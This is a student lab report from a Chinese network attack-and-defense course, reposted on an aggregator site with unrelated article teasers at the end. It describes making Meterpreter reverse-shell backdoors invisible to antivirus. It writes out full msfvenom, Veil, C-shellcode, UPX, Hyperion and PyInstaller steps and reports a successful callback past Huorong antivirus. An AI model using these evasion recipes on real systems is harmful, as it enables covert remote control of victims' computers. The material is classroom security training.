20232302 2025-2026-1《网络与系统攻防技术》实验三实验报告

news/2025/10/26 14:20:48/文章来源:https://www.cnblogs.com/Pumpkin12138/p/19166832

.实验内容

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧。

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

veil,加壳工具

使用C + shellcode编程

 (2)通过组合应用各种技术实现恶意代码免杀。

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。

.问题回答

(1)杀软是如何检测出恶意代码的?

特征码扫描:比对文件中的代码片段与已知病毒特征库,类似“黑名单”匹配。

启发式分析:通过行为规则或代码结构推测可疑行为,无需完整特征。

行为监控:运行时检测程序动作,发现恶意活动即拦截。

沙箱分析:在虚拟隔离环境中运行可疑文件,观察其行为后再判定风险。

云查杀:上传文件信息到云端数据库,实时比对最新威胁情报。

(2)免杀是做什么?

免杀就是通过修改代码或行为,让恶意软件躲过杀毒软件的检测。常用手段包括:改特征(让杀软认不出)、藏内存(不生成文件)、骗沙箱(假装正常程序)。

(3) 免杀的基本方法有哪些?

改特征:加壳、混淆代码,让杀软认不出文件。

藏内存:不生成文件,将恶意代码注入正常程序内存运行。

骗沙箱:检测运行环境,如果是沙箱或虚拟机就不发作。

.实验过程

3.1正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧。
(1)使用msf编码器,使用指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.131 LPORT=2302 -f exe >20232302_1.exe生成一个后门可执行文件 

image

(2)将生成的后门放入virustotal中进行检测。

image

如图所示免杀效果为49/72,后门很容易被检测,因此尝试用msf对后门程序进行一次到多次的编码,查看重新编码后的程序在AV中的扫描效果。

(3)使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.91.131 LPORT=2302 -f exe >20232302_2.exe,并进行检测

image

image

如图所示效果还是不好

(4)使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.91.131 LPORT=2302 -f exe >20232302_3.exe对后门进行12次编码,并进行检测

image

image

如图所示效果依旧不好甚至不如上一个

(5)使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.131 LPORT=2302 -f jar >20232302.jar生成jar文件,并进行检测

image

image

如图所示有了一定的效果但还是不够

(6)msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.91.131 LPORT=2302 x >20232302.php生成.php文件,并进行检测。

image

image

有一定效果继续

(7)使用msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.91.131 LPORT=2302 -f >20232302..py生成.py文件,并进行检测。

image

image

如图可见py效果是最好的

(8)使用msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.91.131 LPORT=2302 x >20232302..apk生成.apk文件,并进行检测。

image

image

3.2使用veil-evasion生成后门程序

1)先更改虚拟机的内存留出足够的空间安装veil,接着使用sudo apt -y install veil

和usr/share/veil/config/setup.sh --force --silent安装

image

(2)接着打开veil并输入use 1进入Evasion模块

image

image

(3)输入list查看载荷种类

image

如图所示载荷c/meterpreter/rev_tcp的序号为7

(4)通过上述的序号查看使用use 7选择该载荷并输入以下代码进行配置

set LHOST 192.168.91.131
set LPORT 2302
generate

image

(4)通过路径/var/lib/veil/output/compiled/20232302.exe找到后门程序,并进行检测

image

image

如图所示效果还是不太好

3.3使用C + shellcode编程实现免杀

(1)使用msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.91.131LPORT=2302 -f c

2302.c进行编辑,将buf添加到代码中

image

image 

(2)输入i686-w64-mingw32-g++ 20232302.c -o 20232302__111.exe运行程序并进行检测 

image

image

如图所示可以提升免杀效果

3.4加壳工具

(1)使用命令upx 20232302_111.exe -o 20232302_111_upx.exeexe程序进行加壳,并进行扫描

image

image

如图所示免杀效果降低了,说明upx工具已被杀毒软件标记,因此更容易被检测。

(2)接着进入上述目录下使用wine hyperion.exe -v 20232302_111.exe 20232302_111_hyp.exe,使用wine在linux下运行hyperion加密器对文件进行加密,并进行检测。 

image

image

如图所示,效果还是不行,因此hyperion不适用

3.5通过组合应用各种技术实现恶意代码免杀

在上述的实验过程中可以发现py文件具有最好的免杀效果所以我们继续用。Py文件并将它传到主机上

image

此时要在主机的终端上安装PyInstaller这样可以将.py文件打包成.exe,接着进行检测

image

如图所示已经可以达到免杀效果

3.6使用火绒杀毒软件,并在虚拟机上完成回连(主机:win11)

1)重新生成一个文件过程和上面一样的.py文件,注意要在终端进行重新打包

image

2)在主机端用火绒查杀

image

如图所示可以达到免杀效果

(3)进行监听和回连测试

image

image

成功!

.问题及解决方案

问题一:virus total人机验证总是过不去

解决:注册账号,这样就能每次只验证一次了

问题二:系统无法找到 AutoIt v3 组件的 WINE 配置文件,导致工具无法正常使用 

image

解决:使用命令sudo /usr/share/veil/config/setup.sh --force --silent下载并配置缺失的 AutoIt v3 组件及其他必要的 WINE 环境

.学习感悟

通过本次对免杀工具的使用,我深刻体会到后门制作与免杀技术的精妙。我们成功将检测率大幅降低,这引发深思:面对更前沿的隐藏技术,依赖特征码的杀软确实难以应对,凸显了其固有的滞后性。实践表明,静态免杀通常只能骗过初步扫描,程序运行后仍易触发行为监控而被拦截。因此,实际攻击往往需要社会工程学配合,诱导用户关闭防护。这一认知让我明白,网络安全绝非单纯的技术攻防。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/946784.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MCP Router使用学习

前言 最近在捣鼓使用 codex,由于 claude code 总是封号,就改用 codex 了,但是 codex 对于导入 mcp 有点麻烦,格式方式与之前不太相同,最近发现有个 mcp 集合工具,准备研究一下如何使用。 1. 为什么要用 MCP Rout…

fvm Flutter多版本管理安装与常用指令

一、安装pub.dev - fvmfvm 官方安装文档,包含各系统安装方式。也通过 Dart 包管理工具安装 FVM:$ brew tap leoafarias/fvm $ brew install fvm# 或$ dart pub global activate fvm环境变量配置建议,在 ~/.zshrc 或…

人生八要(摘抄)

大喜要稳;大怒要忍大惑要等;大悲要静大忙要慢;大闲要勤大富要俭;大穷要志最爱这句: 大惑要等不知道你现在在哪个阶段,希望你能体会其中道理

20232322 2025-2026-1 《网络与系统攻防技术》实验三实验报告

一.实验内容正确使用msf编码器,使用msfvenom生成如jar、php之类的其他文件,并用virustotal进行检测,会使用基本的免杀工具 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连…

详细介绍:vb.net编写DDE(Dynamic Data Exchange)服务器

详细介绍:vb.net编写DDE(Dynamic Data Exchange)服务器pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consola…

2025年内窥镜电缆线厂家权威推荐榜:B超线内窥镜电缆线,专业医疗线缆制造与定制化解决方案精选

2025年内窥镜电缆线厂家权威推荐榜:B超线内窥镜电缆线,专业医疗线缆制造与定制化解决方案精选 随着医疗影像技术的快速发展,内窥镜电缆线作为医疗设备信号传输的关键组件,其性能和质量直接影响诊断结果的准确性。在…

网络流题单

P1343:最大流 模板。 P2740:最大流 模板,文不成文,读题有点难度。 P2936:最大流、哈希 几乎是模板。 P2857:最大流、暴力/二分查找 题干文不成文……复杂度考察题。观察范围,发现暴力枚举+网络流的最坏复杂度是…

无情可破万局

现在的我。我非常喜欢。是的,我开始明白。  “无情可破万局”   --------至自己

2025 年 10 月门窗十大品牌综合实力权威推荐榜单,产能、专利、环保三维数据透视

2025 年 10 月门窗十大品牌综合实力权威推荐榜单,产能、专利、环保三维数据透视引言2025 年 10 月门窗十大品牌综合实力权威推荐榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合发布。本次榜单突破传统性能…

2025年盐趣科研教育深度解析:从录取数据看科研背景如何撬动名校门槛

引言 本文以“录取数据与科研背景关联度”为核心维度,为计划申请海外名校的学生与家长提供一份可量化、可对照的客观参考,避免在背景提升环节盲目投入。 背景与概况 盐趣科研教育(ViaX,官网www.viax.org)成立于20…

2025年10月膜结构厂家推荐榜:双资质企业对比评测 ,

把“膜结构”三个字敲进搜索框的那一刻,你大概率正被以下场景包围:市政广场要赶工期做景观遮阳,业主方要求“既要造型飘逸又要十年不塌”;学校体育馆想把旧网球场改造成全天候气膜馆,预算却被砍了15%;或是景区负…

2025 年 10 月门窗十大品牌综合实力权威推荐榜单,聚焦资质、案例、售后的十家机构深度解读

2025 年 10 月门窗十大品牌综合实力权威推荐榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合发布,十家行业权威机构同步参与解读。本次榜单突破传统评选框架,以《铝合金门窗》(GB/T 8478-2008)为技术基…

2025 年 10 月门窗十大品牌综合实力权威推荐榜单,高性能,稳定性强的行业优选

2025 年 10 月门窗十大品牌综合实力权威推荐榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合发布。本次榜单以 “高性能、强稳定” 为核心评选导向,突破传统单一维度评估,以《铝合金门窗》(GB/T 8478-20…

2025年上海久宙集团:深度解析技术护城河与行业话语权

引言 本文从“技术领先与专利护城”这一核心维度切入,为读者提供一份关于上海久宙集团技术竞争力的客观参考。通过拆解其专利布局、研发平台、标准制定、质量认证及产业协同,帮助采购方、投资机构与同行判断其可持续…

2025年欧那德语深度解析:十二年在线小班模式全透视

引言 本文聚焦“教学服务闭环”这一核心维度,拆解欧那德语自2013年成立以来如何把“教、评、练、测”四个环节嵌进线上小班课,为潜在学习者提供一份可验证、可复盘的客观参照。 背景与概况 欧那德语成立于2013年,是…

在Azure DevOps Server中分析Git代码库的健康状况

在Azure DevOps Server中分析Git代码库的健康状况1. 概述开发团队使用Git作为版本管理工具,需要经常关注Git代码库的状况,例如分析代码库占用磁盘空间大小、开发人员提交和推送代码的频次、分支和标记的数据量、为合…

2025 年 10 月蒸汽发生器厂家最新推荐,聚焦跨平台能力与售后体系的实用指南

在工业数字化转型背景下,蒸汽发生器的跨平台适配能力(如与企业 MES 系统、能源管理平台对接)及完善的售后体系,成为企业保障生产效率的关键。本次推荐依据中国工业节能与清洁生产协会 2025 年 10 月《蒸汽发生器跨…

2025年唐卡装饰权威深度解析:家装行业新格局和品质承诺

本文从“供应链与自营体系”这一核心维度切入,结合公开资料与行业数据,为正在比对装修方案的读者提供一份可验证、可回溯的客观参考。若您关心的是“材料从哪来、谁来管、价格如何压降”,请直接阅读第三、四部分;若…

2025年欧那德语:深度解析其在线教学体系与师资配置

引言 本文将从“师资与教学服务”这一核心维度出发,对欧那德语进行拆解式盘点,为计划报读在线德语课程的学习者提供一份可量化的客观参考。 背景与概况 欧那德语成立于2013年,是一所专为德语学习者提供在线德语学习…

2025年欧那德语权威解析:课程体系与师资全景盘点

引言 本文聚焦“课程体系与师资”这一核心维度,对欧那德语进行深度拆解,为计划系统学习德语、准备留学或职场进阶的读者提供一份可验证、可对照的客观参考。 背景与概况 欧那德语成立于2013年,是一所专为德语学习者…